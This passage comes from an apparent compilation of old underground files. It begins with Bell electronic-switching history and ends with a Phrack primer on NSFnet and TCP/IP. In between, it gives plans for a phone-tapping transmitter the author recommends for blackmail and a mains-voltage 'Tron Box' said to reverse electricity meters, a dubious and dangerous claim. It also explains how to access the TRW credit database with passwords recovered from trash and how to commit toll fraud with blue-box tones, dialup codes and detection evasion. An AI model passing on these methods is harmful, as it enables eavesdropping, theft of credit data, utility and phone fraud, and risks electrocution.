the most trouble, and unexpectedly became the greatest development effort in Bell System's history, was the perfection of an electronic switching system, or ESS. It may be recalled that such a system was the specific end in view when the project that had culminated in the invention of the transistor had been launched back in the 1930s. After successful accomplishment of that planned miracle in 1947-48, further delays were brought about by financial stringency and the need for further development of the transistor itself. In the early 1950s, a Labs team began serious work on electronic switching. 
As early as 1955, Western Electric became involved when five engineers from the Hawthorne works were assigned to collaborate with the Labs on the project. The president of AT&T wrote confidently in 1956, "At Bell Labs, development of the new electronic switching system is going full speed ahead. We are sure this will lead to many improvements in service and also to greater efficiency. The first service trial will start in Morris, Ill., in 1959." Shortly thereafter, Kappel said that the cost of the whole project would probably be $45 million.

But it gradually became apparent that the development of a commercially usable electronic switching system - in effect, a computerized telephone exchange - presented vastly greater technical problems than had been anticipated, and that, accordingly, Bell Labs had vastly underestimated both the time and the investment needed to do the job. The year 1959 passed without the promised first trial at Morris, Illinois; it was finally made in November 1960, and quickly showed how much more work remained to be done. As time dragged on and costs mounted, there was concern at AT&T and something approaching panic at Bell Labs. But the project had to go forward; by this time the investment was too great to be sacrificed, and in any case, forward projections of increased demand for telephone service indicated that within a few years a time would come when, without the quantum leap in speed and flexibility that electronic switching would provide, the national network would be unable to meet the demand.

In November 1963, an all-electronic switching system went into use at the Brown Engineering Company at Cocoa Beach, Florida. But this was a small installation, essentially another test installation, serving only a single company. Kappel's tone on the subject in the 1964 annual report was, for him, almost apologetic: "Electronic switching equipment must be manufactured in volume to unprecedented standards of reliability....
To turn out the equipment economically and with good speed, mass production methods must be developed; but, at the same time, there can be no loss of precision..."

Another year and millions of dollars later, on May 30, 1965, the first commercial electronic central office was put into service at Succasunna, New Jersey. Even at Succasunna, only 200 of the town's 4,300 subscribers initially had the benefit of electronic switching's added speed and additional services, such as provision for three party conversations and automatic transfer of incoming calls. But after that, ESS was on its way. In January 1966, the second commercial installation, this one serving 2,900 telephones, went into service in Chase, Maryland. By the end of 1967 there were additional ESS offices in California, Connecticut, Minnesota, Georgia, NY, Florida, and Pennsylvania; by the end of 1970 there were 120 offices serving 1.8 million customers; and by 1974 there were 475 offices serving 5.6 million customers.

The difference between conventional switching and electronic switching is the difference between "hardware" and "software"; in the former case, maintenance is done on the spot, with screwdriver and pliers, while in the case of electronic switching, it can be done remotely, by computer, from a central point, making it possible to have only one or two technicians on duty at a time at each switching center. The development program, when the final figures were added up, was found to have required a staggering four thousand man-years of work at Bell Labs and to have cost not $45 million but $500 million!

117.The Lunch Box by The Jolly Roger

Introduction

The Lunch Box is a VERY simple transmitter which can be handy for all sorts of things. It is quite small and can easily be put in a number of places. I have successfully used it for tapping fones, getting inside info, blackmail and other such things. The possibilities are endless.
I will also include the plans or an equally small receiver for your newly made toy. Use it for just about anything. You can also make the transmitter and receiver together in one box and use it as a walkie talkie. Materials you will need · (1) 9 volt battery with battery clip · (1) 25-mfd, 15 volt electrolytic capacitor · (2) .0047 mfd capacitors · (1) .022 mfd capacitor · (1) 51 pf capacitor · (1) 365 pf variable capacitor · (1) Transistor antenna coil · (1) 2N366 transistor · (1) 2N464 transistor · (1) 100k resistor · (1) 5.6k resistor · (1) 10k resistor · (1) 2meg potentiometer with SPST switch · Some good wire, solder, soldering iron, board to put it on, box (optional) Schematic for The Lunch Box This may get a tad confusing but just print it out and pay attention. [!] ! 51 pf ! ---+---- ------------base collector ! )( 2N366 +----+------/\/\/----GND 365 pf () emitter ! ! )( ! ! +-------- ---+---- ! ! ! ! ! ! ! GND / .022mfd ! ! 10k\ ! ! ! / GND +------------------------emitter ! ! ! 2N464 / .0047 ! base collector 2meg \----+ ! ! +--------+ ! / ! GND ! ! ! GND ! ! ! +-------------+.0047+--------------------+ ! ! ! +--25mfd-----+ -----------------------------------------+ ! ! microphone +--/\/\/-----+ ---------------------------------------------+ 100k ! ! GND---->/<---------------------!+!+!+---------------+ switch Battery from 2meg pot. Notes about the schematic 1.GND means ground 2.The GND near the switch and the GND by the 2meg potentiometer should be connected. 3.Where you see: )( () )( it is the transistor antenna coil with 15 turns of regular hook-up wire around it. 4.The middle of the loop on the left side (the left of "()") you should run a wire down to the "+" which has nothing attached to it. There is a .0047 capacitor on the correct piece of wire. 5.For the microphone use a magnetic earphone (1k to 2k). 6.Where you see "[!]" is the antenna. Use about 8 feet of wire to broadcast approx. 300ft. 
Part 15 of the FCC rules and regulation says you can't broadcast over 300 feet without a license. (Hahaha). Use more wire for an antenna for longer distances. (Attach it to the black wire on the fone line for about a 250 foot antenna!) Operation of the Lunch Box This transmitter will send the signals over the AM radio band. You use the variable capacitor to adjust what freq. you want to use. Find a good unused freq. down at the lower end of the scale and you're set. Use the 2 meg pot. to adjust gain. Just fuck with it until you get what sounds good. The switch on the 2meg is for turning the Lunch Box on and off. When everything is adjusted, turn on an AM radio adjust it to where you think the signal is. Have a friend lay some shit thru the Box and tune in to it. That's all there is to it. The plans for a simple receiver are shown below: The Lunch Box receiver · (1) 9 volt battery with battery clip · (1) 365 pf variable capacitor · (1) 51 pf capacitor · (1) 1N38B diode · (1) Transistor antenna coil · (1) 2N366 transistor · (1) SPST toggle switch · (1) 1k to 2k magnetic earphone Schematic for receiver [!] ! 51 pf ! +----+----+ ! ! ) 365 pf (----+ ! ) ! ! +---------+---GND ! +---*>!----base collector----- diode 2N366 earphone emitter +----- ! ! GND ! - + - battery + GND------>/<------------+ switch Closing statement This two devices can be built for under a total of $10.00. Not too bad. Using these devices in illegal ways is your option. If you get caught, I accept NO responsibility for your actions. This can be a lot of fun if used correctly. Hook it up to the red wire on the phone line and it will send the conversation over the air waves. 118.Olive Box Plans by The Jolly Roger This is a relatively new box, and all it basically does is serve as a phone ringer. You have two choices for ringers, a piezoelectric transducer (ringer), or a standard 8 ohm speaker. The speaker has a more pleasant tone to it, but either will do fine. 
This circuit can also be used in conjunction with a rust box to control an external something or other when the phone rings. Just connect the 8 ohm speaker output to the inputs on the rust box, and control the pot to tune it to light the light (which can be replaced by a relay for external controlling) when the phone rings.

______________ | | ^ NC --|-- 5 4 --|-----/\/\/------->G | | / R2 G<----)|----|-- 6 3 --|-- NC | C3 | U1 | -------|-- 7 2 --|---------- --- -- - > TO RINGER | | ----|-- 8 1 --|-- | |______________| | | ---/\/\/----|(----- L1 | R1 C1 ------------------------------------------ L2
a. Main ringer TTL circuit
(>::::::::::::::::::::::::::::::::::::::::::::::::::::::::<)
_ FROM PIN 2 < - -- --- ----------| |_| |------------->G P1
b. Piezoelectric transducer
(>::::::::::::::::::::::::::::::::::::::::::::::::::::::::<)
__ /| FROM PIN 2 < - -- --- ---------|(---------. .-------| |/ | >||< |S1| | >||< --| | | >||< | |__|\ | G<---------.>||<.--- \| T1
c. Electromagnetic transducer

Parts List
· U1 - Texas Instruments TCM1506
· T1 - 4000:8 ohm audio transformer
· S1 - 8 ohm speaker
· R1 - 2.2k resistor
· R2 - External variable resistor; adjusts timing frequency
· C1 - .47uF capacitor
· C2 - .1uF capacitor
· C3 - 10uF capacitor
· L1 - Tip
· L2 - Ring
· L1 and L2 are the phone line.

Shift Rate: This is the formula for determining the shift rate:

$$SR = \frac{1}{DSR\left(\frac{1}{f_1}\right) + DSR\left(\frac{1}{f_2}\right)} = \frac{1}{\frac{128}{1714} + \frac{128}{1500}} \approx 6\ \text{Hz}$$

· DSR = Shift Divider Rate ratio = 128
· f1 = High Output Frequency = 1714
· f2 = Low Output Frequency = 1500

119.The Tron Box by The GREAT Captain Crunch!!
------------------R-----F---- I I I I I I I I- (C) (C) (C) I I I I- I I I I ----------------------------- · (C)=capacitor · F =fuse · R =resistor · I,- are wire Parts List: · (3) electrolytic capacitors rated at 50V(lowest) .47UF · (1) 20-30 OHM « Watt resistor · (1) 120Volt fuse (amp rating best to use at least half of total house current or even less it keeps you from blowing your breaker just in case...) · (1) power cord (cut up an extension cord. Need plug part and wire) · (1) electrically insulated box for the rest of us. If your don't feel comfortable about electricity then don't play with this. There is voltage present that will ***kill you***. The thing works when the load in your house is low like at night time. It will put a reverse phase signal on the line and cancel out the other phase and put a reverse phase running everything in the house. Well if you have ever switched the power leads on a D\C (battery powered) motor you will see that it runs backwards well your electric meter sort of works this way...so reverse phase makes the meter slow down and if your lucky it will go backwards. Anyway it means a cheaper electric bill. 120.More TRW Info by The Jolly Roger TRW is a large database in which company's and banks can run credit checks on their customers. Example: John Jones orders $500 worth of stereo equipment from the Joe Blow Electronic distributing Co. Well it could be that he gave the company a phony credit card number, or doesn't have enough credit, etc. Well they call up TRW and then run a check on him, TRW then lists his card numbers (everything from sears to visa) and tells the numbers, credit, when he lost it last (if he ever did) and then of course tells if he has had any prior problems paying his bills. I would also like to add that although TRW contains information on millions of people, not every part of the country is served, although the major area are.. 
So if you hate someone and live in a small state, you probably wont be able to order him 300 pink toilet seats from K-mart. Logging on To log on, you dial-up your local access number (or long-distance, what ever turns you on) and wait for it to say "TRW" at this prompt, you type either an "A" or a "Ctrl-G" and it will say "circuit building in progress" it will wait for a minute and then clear the screen, now you will type one of the following. Tca1 Tca2 Tnj1 Tga1 This is to tell it what geographical area the customer is in, it really doesn't matter which you use, because TRW will automatically switch when it finds the record.. Next, you will type in the pswd and info on the person you are trying to get credit info on. You type it in a format like this: Rts Pswd Lname Fname ...,House number First letter of street name Zip now you type ctrl s and 2 ctrl-Q's here is what it looks like in real life: Ae: Dialing xxx-xxx-xxxx (screen clear) TRW ^G circuit building in progress (pause . . . screen clear) Tca1 Rtc 3966785-cm5 Johnson David ...,4567 R 56785 ^s ^q ^q and then it will wait for a few seconds and print out the file on him (if it can locate one for the guy) Note: You may have to push return when you first connect to get the systems attention. Getting Your Passwords To obtain pswds, you go down to your favorite bank or sears store and dig through the trash (hence the name trashing) looking for printouts, if they are a big enough place, and live in a TRW area, then they will probably have some. The printouts will have the 7 digit subscriber code, leaving the 3-4 digit pswd up to you. Much like trashing down at good old ma bell. 121.Phreaker's Phunhouse by the Jolly Roger The long awaited prequil to Phreaker's Guide has finally arrived. Conceived from the boredom and loneliness that could only be derived from: The Traveler! But now, he has returned in full strength (after a small vacation) and is here to 'World Premiere' the new files everywhere. Stay cool. 
This is the prequel to the first one, so just relax. This is not made to be an exclusive ultra elite file, so kinda calm down and watch in the background if you are too cool for it.

Phreak Dictionary

Here you will find some of the basic but necessary terms that should be known by any phreak who wants to be respected at all.

Phreak:
1.The action of using mischievous and mostly illegal ways in order to not pay for some sort of telecommunications bill, order, transfer, or other service. It often involves usage of highly illegal boxes and machines in order to defeat the security that is set up to avoid this sort of happening. [fr'eaking]. v.
2.A person who uses the above methods of destruction and chaos in order to make a better life for all. A true phreaker will not go against his fellows or narc on people who have ragged on him or do anything termed to be dishonorable to phreaks. [fr'eek]. n.
3.A certain code or dialup useful in the action of being a phreak. (Example: "I hacked a new metro phreak last night.")

Switching System:
1.There are 3 main switching systems currently employed in the US, and a few other systems will be mentioned as background.
· SxS: This system was invented in 1918 and was employed in over half of the country until 1978. It is a very basic system that is a general waste of energy and hard work on the linesman. A good way to identify this is that it requires a coin in the phone booth before it will give you a dial tone, or that no call waiting, call forwarding, or any other such service is available. Stands for: Step by Step
· XB: This switching system was first employed in 1978 in order to take care of most of the faults of SxS switching. Not only is it more efficient, but it also can support different services in various forms. XB1 is Crossbar Version 1. That is very limited and is hard to distinguish from SxS except by direct view of the wiring involved. Next up was XB4, Crossbar Version 4.
With this system, some of the basic things like DTMF that were not available with SxS can be accomplished. For the final stroke of XB, XB5 was created. This is a service that can allow DTMF plus most 800 type services (which were not always available.) Stands for: Crossbar.
· ESS: A nightmare in telecom. In vivid color, ESS is a pretty bad thing to have to stand up to. It is quite simple to identify. Dialing 911 for emergencies, and ANI [see ANI below] are the most common facets of the dread system. ESS has the capability to list in a person's caller log what number was called, how long the call took, and even the status of the conversation (modem or otherwise.) Since ESS has been employed, which has been very recently, it has gone through many kinds of revisions. The latest system to date is ESS 11a, that is employed in Washington D.C. for security reasons. ESS is truly trouble for any phreak, because it is 'smarter' than the other systems. For instance, if on your caller log they saw 50 calls to 1-800-421-9438, they would be able to do a CN/A [see Loopholes below] on your number and determine whether you are subscribed to that service or not. This makes most calls a hazard, because although 800 numbers appear to be free, they are recorded on your caller log and then right before you receive your bill it deletes the billings for them. But before that they are open to inspection, which is one reason why extended use of any code is dangerous under ESS. Some of the boxes [see Boxing below] are unable to function in ESS. It is generally a menace to the true phreak. Stands For: Electronic Switching System.

Because they could appear on a filter somewhere or maybe it is just nice to know them anyways.
· SSS: Strowger Switching System. First non-operator system available.
· WES: Western Electronics Switching. Used about 40 years ago with some minor places out west.
Boxing:
1.The use of personally designed boxes that emit or cancel electronic impulses that allow simpler acting while phreaking. Through the use of separate boxes, you can accomplish most feats possible with or without the control of an operator.
2.Some boxes and their functions are listed below. Ones marked with '*' indicate that they are not operable in ESS.
· *Black Box: Makes it seem to the phone company that the phone was never picked up.
· Blue Box: Emits a 2600hz tone that allows you to do such things as stack a trunk line, kick the operator off line, and others.
· Red Box: Simulates the noise of a quarter, nickel, or dime being dropped into a payphone.
· Cheese Box: Turns your home phone into a pay phone to throw off traces (a red box is usually needed in order to call out.)
· *Clear Box: Gives you a dial tone on some of the old SxS payphones without putting in a coin.
· Beige Box: A simpler produced linesman's handset that allows you to tap into phone lines and extract by eavesdropping, or crossing wires, etc.
· Purple Box: Makes all calls made out from your house seem to be local calls.

ANI [ANI]:
1.Automatic Number Identification. A service available on ESS that allows a phone service [see Dialups below] to record the number that any certain code was dialed from along with the number that was called and print both of these on the customer bill.
2.Dialups [see Dialups below] are all designed just to use ANI. Some of the services do not have the proper equipment to read the ANI impulses yet, but it is impossible to see which is which without being busted or not busted first.

Dialups [dy'l'ups]:
1.Any local or 800 extended outlet that allows instant access to any service such as MCI, Sprint, or AT&T that from there can be used by hand-picking or using a program to reveal other people's codes which can then be used moderately until they find out about it and you must switch to another code (preferably before they find out about it.)
2.Dialups are extremely common on both senses. Some dialups reveal the company that operates them as soon as you hear the tone. Others are much harder and some you may never be able to identify. A small list of dialups: 1-800-421-9438 (5 digit codes) 1-800-547-6754 (6 digit codes) 1-800-345-0008 (6 digit codes) 1-800-734-3478 (6 digit codes) 1-800-222-2255 (5 digit codes) 3.Codes: Codes are very easily accessed procedures when you call a dialup. They will give you some sort of tone. If the tone does not end in 3 seconds, then punch in the code and immediately following the code, the number you are dialing but strike the '1' in the beginning out first. If the tone does end, then punch in the code when the tone ends. Then, it will give you another tone. Punch in the number you are dialing, or a '9'. If you punch in a '9' and the tone stops, then you messed up a little. If you punch in a tone and the tone continues, then simply dial then number you are calling without the '1'. 4.All codes are not universal. The only type that I know of that is truly universal is Metrophone. Almost every major city has a local Metro dialup (for Philadelphia, (215)351-0100/0126) and since the codes are universal, almost every phreak has used them once or twice. They do not employ ANI in any outlets that I know of, so feel free to check through your books and call 555-1212 or, as a more devious manor, subscribe yourself. Then, never use your own code. That way, if they check up on you due to your caller log, they can usually find out that you are subscribed. Not only that but you could set a phreak hacker around that area and just let it hack away, since they usually group them, and, as a bonus, you will have their local dialup. 5.950's. They seem like a perfectly cool phreakers dream. They are free from your house, from payphones, from everywhere, and they host all of the major long distance companies (950)1044 , (950)1077 , 950-1088 , 950-1033 .) Well, they aren't. 
They were designed for ANI. That is the point, end of discussion. A phreak dictionary. If you remember all of the things contained on that file up there, you may have a better chance of doing whatever it is you do. This next section is maybe a little more interesting... Blue Box Plans: These are some blue box plans, but first, be warned, there have been 2600hz tone detectors out on operator trunk lines since XB4. The idea behind it is to use a 2600hz tone for a few very naughty functions that can really make your day lighten up. But first, here are the plans, or the heart of the file: 700 : 1 : 2 : 4 : 7 : 11 : 900 : + : 3 : 5 : 8 : 12 : 1100 : + : + : 6 : 9 : KP : 1300 : + : + : + : 10 : KP2 : 1500 : + : + : + : + : ST : : 700 : 900 :1100 :1300 :1500 : Stop! Before you diehard users start piecing those little tone tidbits together, there is a simpler method. If you have an Apple-Cat with a program like Cat's Meow IV, then you can generate the necessary tones, the 2600hz tone, the KP tone, the KP2 tone, and the ST tone through the dial section. So if you have that I will assume you can boot it up and it works, and I'll do you the favor of telling you and the other users what to do with the blue box now that you have somehow constructed it. The connection to an operator is one of the most well known and used ways of having fun with your blue box. You simply dial a TSPS (Traffic Service Positioning Station, or the operator you get when you dial '0') and blow a 2600hz tone through the line. Watch out! Do not dial this direct! After you have done that, it is quite simple to have fun with it. Blow a KP tone to start a call, a ST tone to stop it, and a 2600hz tone to hang up. Once you have connected to it, here are some fun numbers to call with it: 0-700-456-1000 Teleconference (free, because you are the operator!) 
(Area code)-101 Toll Switching (Area code)-121 Local Operator (hehe) (Area code)-131 Information (Area code)-141 Rate & Route (Area code)-181 Coin Refund Operator (Area code)-11511 Conference operator (when you dial 800-544-6363) Well, those were the tone matrix controllers for the blue box and some other helpful stuff to help you to start out with. But those are only the functions with the operator. There are other k-fun things you can do with it. More advanced Blue Box Stuff: Oops. Small mistake up there. I forgot tone lengths. Um, you blow a tone pair out for up to 1/10 of a second with another 1/10 second for silence between the digits. KP tones should be sent for 2/10 of a second. One way to confuse the 2600hz traps is to send pink noise over the channel (for all of you that have decent BSR equalizers, there is major pink noise in there.) Using the operator functions is the use of the 'inward' trunk line. That is working it from the inside. From the 'outward' trunk, you can do such things as make emergency breakthrough calls, tap into lines, busy all of the lines in any trunk (called 'stacking'), enable or disable the TSPS's, and for some 4a systems you can even re-route calls to anywhere. All right. The one thing that every complete phreak guide should be without is blue box plans, since they were once a vital part of phreaking. Another thing that every complete file needs is a complete listing of all of the 800 numbers around so you can have some more fun. /-/ 800 Dialup Listings /-/ 1-800-345-0008 (6) 1-800-547-6754 (6) 1-800-245-4890 (4) 1-800-327-9136 (4) 1-800-526-5305 (8) 1-800-858-9000 (3) 1-800-437-9895 (7) 1-800-245-7508 (5) 1-800-343-1844 (4) 1-800-322-1415 (6) 1-800-437-3478 (6) 1-800-325-7222 (6) All right, set Cat Hacker 1.0 on those numbers and have a fuck of a day. That is enough with 800 codes, by the time this gets around to you I don't know what state those codes will be in, but try them all out anyways and see what you get. 
On some 800 services now, they have an operator who will answer and ask you for your code, and then your name. Some will switch back and forth between voice and tone verification, you can never be quite sure which you will be up against. Armed with this knowledge you should be having a pretty good time phreaking now. But class isn't over yet, there are still a couple important rules that you should know. If you hear continual clicking on the line, then you should assume that an operator is messing with something, maybe even listening in on you. It is a good idea to call someone back when the phone starts doing that. If you were using a code, use a different code and/or service to call him back. A good way to detect if a code has gone bad or not is to listen when the number has been dialed. If the code is bad you will probably hear the phone ringing more clearly and more quickly than if you were using a different code. If someone answers voice to it then you can immediately assume that it is an operative for whatever company you are using. The famed '311311' code for Metro is one of those. You would have to be quite stupid to actually respond, because whoever you ask for the operator will always say 'He's not in right now, can I have him call you back?' and then they will ask for your name and phone number. Some of the more sophisticated companies will actually give you a carrier on a line that is supposed to give you a carrier and then just have garbage flow across the screen like it would with a bad connection. That is a feeble effort to make you think that the code is still working and maybe get you to dial someone's voice, a good test for the carrier trick is to dial a number that will give you a carrier that you have never dialed with that code before, that will allow you to determine whether the code is good or not. For our next section, a lighter look at some of the things that a phreak should not be without. A vocabulary. 
A few months ago, it was a quite strange world for the modem people out there. But now, a phreaker's vocabulary is essential if you wanna make a good impression on people when you post what you know about certain subjects. /-/ Vocabulary /-/ - Do not misspell except certain exceptions: phone -> fone freak -> phreak - Never substitute 'z's for 's's. (i.e. codez -> codes) - Never leave many characters after a post (i.e. Hey Dudes!#!@#@!#!@) - NEVER use the 'k' prefix (k-kool, k-rad, k-whatever) - Do not abbreviate. (I got lotsa wares w/ docs) - Never substitute '0' for 'o' (r0dent, l0zer). - Forget about ye old upper case, it looks ruggyish. All right, that was to relieve the tension of what is being drilled into your minds at the moment. Now, however, back to the teaching course. Here are some things you should know about phones and billings for phones, etc. LATA: Local Access Transference Area. Some people who live in large cities or areas may be plagued by this problem. For instance, let's say you live in the 215 area code under the 542 prefix (Ambler, Fort Washington). If you went to dial in a basic Metro code from that area, for instance, 351-0100, that might not be counted under unlimited local calling because it is out of your LATA. For some LATA's, you have to dial a '1' without the area code before you can dial the phone number. That could prove a hassle for us all if you didn't realize you would be billed for that sort of call. In that way, sometimes, it is better to be safe than sorry and phreak. The Caller Log: In ESS regions, for every household around, the phone company has something on you called a Caller Log. This shows every single number that you dialed, and things can be arranged so it showed every number that was calling to you. That's one main disadvantage of ESS, it is mostly computerized so a number scan could be done like that quite easily. Using a dialup is an easy way to screw that, and is something worth remembering. 
Anyways, with the caller log, they check up and see what you dialed. Hmm... you dialed 15 different 800 numbers that month. Soon they find that you are subscribed to none of those companies. But that is not the only thing. Most people would imagine "But wait! 800 numbers don't show up on my phone bill!". To those people, it is a nice thought, but 800 numbers are picked up on the caller log until right before they are sent off to you. So they can check right up on you before they send it away and can note the fact that you fucked up slightly and called one too many 800 lines. Right now, after all of that, you should have a pretty good idea of how to grow up as a good phreak. Follow these guidelines, don't show off, and don't take unnecessary risks when phreaking or hacking. 122.Phrack Magazine - Vol. 3, Issue 27 by Knight Lightning Prologue If you are not already familiar with NSFnet, I would suggest that you read: "Frontiers" (Phrack Inc., Volume Two, Issue 24, File 4 of 13), and definitely; "NSFnet: National Science Foundation Network" (Phrack Inc., Volume Three, Issue 26, File 4 of 11). Introduction MIDNET is a regional computer network that is part of the NSFnet, the National Science Foundation Network. Currently, eleven mid-United States universities are connected to each other and to the NSFnet via MIDnet: UA - University of Arkansas at Fayetteville ISU - Iowa State University at Ames UI - University of Iowa at Iowa City KSU - Kansas State University at Manhattan KU - University of Kansas at Lawrence UMC - University of Missouri at Columbia WU - Washington University at St. 
Louis, Missouri UNL - University of Nebraska at Lincoln OSU - Oklahoma State University at Stillwater UT - University of Tulsa (Oklahoma) OU - University of Oklahoma at Norman Researchers at any of these universities that have funded grants can access the six supercomputer centers funded by the NSF: John von Neumann Supercomputer Center National Center for Atmospheric Research Cornell National Supercomputer Facility National Center for Supercomputing Applications Pittsburgh Supercomputing Center San Diego Supercomputing Center In addition, researchers and scientists can communicate with each other over a vast world-wide computer network that includes the NSFnet, ARPAnet, CSnet, BITnet, and others that you have read about in The Future Transcendent Saga. Please refer to "Frontiers" (Phrack Inc., Volume Two, Issue 24, File 4 of 13) for more details. MIDnet is just one of several regional computer networks that comprise the NSFnet system. Although all of these regional computer networks work the same, MIDnet is the only one that I have direct access to and so this file is written from a MIDnet point of view. For people who have access to the other regional networks of NSFnet, the only real differences depicted in this file that would not apply to the other regional networks are the universities that are served by MIDnet as opposed to: NYSERnet in New York State SURAnet in the southeastern United States SESQUInet in Texas BARRnet in the San Francisco area MERIT in Michigan (There are others that are currently being constructed.) These regional networks all hook into the NSFnet backbone, which is a network that connects the six supercomputer centers. For example, a person at Kansas State University can connect with a supercomputer via MIDnet and the NSFnet backbone. That researcher can also send mail to colleagues at the University of Delaware by using MIDnet, NSFnet and SURAnet.
Each university has its own local computer network which connects on-campus computers as well as providing a means of connecting to a regional network. Some universities are already connected to older networks such as CSnet, the ARPAnet and BITnet. In principle, any campus connected to any of these networks can access anyone else in any other network since there are gateways between the networks. Gateways are specialized computers that forward network traffic, thereby connecting networks. In practice, these wide-area networks use different networking technologies, which makes it impossible to provide full functionality across the gateways. However, mail is almost universally supported across all gateways, so that a person at a BITnet site can send mail messages to a colleague at an ARPAnet site (or anywhere else for that matter). You should already be somewhat familiar with this, but if not, refer to "Limbo To Infinity" (Phrack Inc., Volume Two, Issue 24, File 3 of 13) and "Internet Domains" (Phrack Inc., Volume Three, Issue 26, File 8 of 11). Computer networks rely on hardware and software that allow computers to communicate. The language that enables network communication is called a protocol. There are many different protocols in use today. MIDnet uses the TCP/IP protocols, also known as the DOD (Department of Defense) Protocol Suite. Other networks that use TCP/IP include ARPAnet, CSnet and the NSFnet. In fact, all the regional networks that are linked to the NSFnet backbone are required to use TCP/IP. At the local campus level, TCP/IP is often used, although other protocols such as IBM's SNA and DEC's DECnet are common. In order to communicate with a computer via MIDnet and the NSFnet, a computer at a campus must use TCP/IP directly or use a gateway that will translate its protocols into TCP/IP.
The Internet is a world-wide computer network that is the conglomeration of most of the large wide area networks, including ARPAnet, CSnet, NSFnet, and the regionals, such as MIDnet. To a lesser degree, other networks such as BITnet that can send mail to hosts on these networks are included as part of the Internet. This huge network of networks, the Internet, as you have by now read all about in the pages of Phrack Inc., is a rapidly growing and very complex entity that allows sophisticated communication between scientists, students, government officials and others. Being a part of this community is both exciting and challenging. This chapter of the Future Transcendent Saga gives a general description of the protocols and software used in MIDnet and the NSFNet. A discussion of several of the more commonly used networking tools is also included to enable you to make practical use of the network as soon as possible. The DOD Protocol Suite The DOD Protocol Suite includes many different protocols. Each protocol is a specification of how communication is to occur between computers. Computer hardware and software vendors use the protocol to create programs and sometimes specialized hardware in order to implement the network function intended by the protocol. Different implementations of the same protocol exist for the varied hardware and operating systems found in a network. The three most commonly used network functions are: Mail -- Sending and receiving messages File Transfer -- Sending and receiving files Remote Login -- Logging into a distant computer Of these, mail is probably the most commonly used. In the TCP/IP world, there are three different protocols that realize these functions: SMTP -- (Simple Mail Transfer Protocol) Mail FTP -- (File Transfer Protocol) sending and receiving files Telnet -- Remote login How to use these protocols is discussed in the next section. At first glance, it is not obvious why these three functions are the most common. 
After all, mail and file transfer seem to be the same thing. However, mail messages are not identical to files, since they are usually comprised of only ASCII characters and are sequential in structure. Files may contain binary data and have complicated, non-sequential structures. Also, mail messages can usually tolerate some errors in transmission whereas files should not contain any errors. Finally, file transfers usually occur in a secure setting (i.e., the users who are transferring files know each other's names and passwords and are permitted to transfer the file), whereas mail can be sent to anybody as long as their name is known. While mail and file transfer accomplish the transfer of raw information from one computer to another, Telnet allows a distant user to process that information, either by logging in to a remote computer or by linking to another terminal. Telnet is most often used to remotely log in to a distant computer, but it is actually a general-purpose communications protocol. I have found it incredibly useful over the last year. In some ways, it could be used for a great deal of access because you can directly connect to another computer anywhere that has TCP/IP capabilities; however, please note that Telnet is *NOT* Telenet.

There are other functions that some networks provide, including the following:

· Name to address translation for networks, computers and people
· The current time
· Quote of the day or fortune
· Printing on a remote printer, or use of any other remote peripheral
· Submission of batch jobs for non-interactive execution
· Dialogues and conferencing between multiple users
· Remote procedure call (i.e., distributing program execution over several remote computers)
· Transmission of voice or video information

Some of these functions are still in the experimental stages and require faster computer networks than currently exist. In the future, new functions will undoubtedly be invented and existing ones improved.
The DOD Protocol Suite is a layered network architecture, which means that network functions are performed by different programs that work independently and in harmony with each other. Not only are there different programs but there are different protocols. The protocols SMTP, FTP and Telnet are described above. Protocols have been defined for getting the current time, the quote of the day, and for translating names. These protocols are called applications protocols because users directly interact with the programs that implement these protocols. The Transmission Control Protocol, TCP, is used by many of the application protocols. Users almost never interact with TCP directly. TCP establishes a reliable end-to-end connection between two processes on remote computers. Data is sent through a network in small chunks called packets to improve reliability and performance. TCP ensures that packets arrive in order and without errors. If a packet does have errors, TCP requests that the packet be retransmitted. In turn, TCP calls upon IP, Internet Protocol, to move the data from one network to another. IP is still not the lowest layer of the architecture, since there is usually a "data link layer protocol" below it. This can be any of a number of different protocols, two very common ones being X.25 and Ethernet. FTP, Telnet and SMTP are called "application protocols", since they are directly used by applications programs that enable users to make use of the network. Network applications are the actual programs that implement these protocols and provide an interface between the user and the computer. An implementation of a network protocol is a program or package of programs that provides the desired network function such as file transfer. Since computers differ from vendor to vendor (e.g. IBM, DEC, CDC), each computer must have its own implementation of these protocols. However, the protocols are standardized so that computers can interoperate over the network (i.e., can understand and process each other's data). For example, a TCP packet generated by an IBM computer can be read and processed by a DEC computer. In many instances, network applications programs use the name of the protocol. For example, the program that transfers files may be called "FTP" and the program that allows remote logins may be called "Telnet." Sometimes these protocols are incorporated into larger packages, as is common with SMTP. Many computers have mail programs that allow users on the same computer to send mail to each other. SMTP functions are often added to these mail programs so that users can also send and receive mail through a network. In such cases, there is no separate program called SMTP that the user can access, since the mail program provides the user interface to this network function. Specific implementations of network protocols, such as FTP, are tailored to the computer hardware and operating system on which they are used. Therefore, the exact user interface varies from one implementation to another. For example, the FTP protocol specifies a set of FTP commands which each FTP implementation must understand and process. However, these are usually placed at a low level, often invisible to the user, who is given a higher set of commands to use. These higher-level commands are not standardized so they may vary from one implementation of FTP to another. For some operating systems, not all of these commands make equal sense, such as "Change Directory," or may have different meanings. Therefore the specific user interface that the user sees will probably differ. This file describes a generic implementation of the standard TCP/IP application protocols. Users must consult local documentation for specifics at their sites.

Names and Addresses In A Network

In the DOD Protocol Suite, each network is given a unique identifying number.
This number is assigned by a central authority, namely the Network Information Center run by SRI, abbreviated as SRI-NIC, in order to prevent more than one network from having the same network number. For example, the ARPAnet has network number 10 while MIDnet has a longer number, namely 128.242. Each host in a network has a unique identification so other hosts can specify them unambiguously. Host numbers are usually assigned by the organization that manages the network, rather than one central authority. Host numbers do not need to be unique throughout the whole Internet but two hosts on the same network need to have unique host numbers. The combination of the network number and the host number is called the IP address of the host and is specified as a 32-bit binary number. All IP addresses in the Internet are expressible as 32-bit numbers, although they are often written in dotted decimal notation. Dotted decimal notation breaks the 32-bit number into four eight-bit parts or octets and each octet is specified as a decimal number. For example, 00000001 is the binary octet that specifies the decimal number 1, while 11000000 specifies 192. Dotted decimal notation makes IP addresses much easier to read and remember. Computers in the Internet are also identified by hostnames, which are strings of characters, such as "phrackvax." However, IP packets must specify the 32-bit IP address instead of the hostname so some way to translating hostnames to IP addresses must exist. One way is to have a table of hostnames and their corresponding IP addresses, called a hosttable. Nearly every TCP/IP implementation has such a hosttable, although the weaknesses of this method are forcing a shift to a new scheme called the domain name system. In UNIX systems, the hosttable is often called "/etc/hosts." You can usually read this file and find out what the IP addresses of various hosts are. Other systems may call this file by a different name and make it unavailable for public viewing. 
